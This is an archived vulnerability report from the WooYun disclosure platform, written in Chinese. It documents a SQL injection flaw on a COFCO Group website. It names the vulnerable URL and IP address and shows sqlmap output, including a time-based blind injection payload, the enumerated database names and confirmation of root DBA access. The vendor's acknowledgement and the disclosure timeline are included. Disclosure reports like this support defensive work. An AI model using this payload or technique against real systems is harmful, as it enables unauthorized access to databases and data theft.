乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-12: 细节已通知厂商并且等待厂商处理中 2015-08-12: 厂商已经确认,细节仅向厂商公开 2015-08-22: 细节向核心白帽子及相关领域专家公开 2015-09-01: 细节向普通白帽子公开 2015-09-11: 细节向实习白帽子公开 2015-09-26: 细节向公众公开
中粮集团某站存在SQL注入
注入点:http://219.143.252.220/yyoa/checkWaitdo.jsp?userID=1
放到sqlmap跑下:
---Parameter: userID (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: userID=1' AND (SELECT * FROM (SELECT(SLEEP(5)))PlDJ) AND 'mYTy'='mYTy---[19:15:25] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL 5.0.12[19:15:25] [INFO] fetching database names[19:15:25] [INFO] fetching number of databases[19:15:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] [19:15:37] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 5[19:15:43] [INFO] retrieved: [19:15:48] [INFO] adjusting time delay to 1 second due to good response timesinformation_schema[19:17:13] [INFO] retrieved: mysql[19:17:38] [INFO] retrieved: mysql3235[19:18:18] [INFO] retrieved: temp[19:18:40] [INFO] retrieved: testavailable databases [5]:[*] information_schema[*] mysql[*] mysql3235[*] temp[*] test[19:19:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/219.143.252.220'
is-dba : root@localhost 权限!
[19:47:28] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL 5.0.12[19:47:28] [INFO] testing if current user is DBA[19:47:28] [INFO] fetching current user[19:47:28] [WARNING] time-based comparison requires larger statistical model, please wait.............................. do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] [19:47:38] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors [19:47:48] [INFO] adjusting time delay to 1 second due to good response timesroot@localhostcurrent user is DBA: True[19:49:02] [INFO] fetched data logged to text files under '/root/.sqlmap/output/219.143.252.220'
过滤转义
危害等级:高
漏洞Rank:20
确认时间:2015-08-12 15:38
非常感谢!
暂无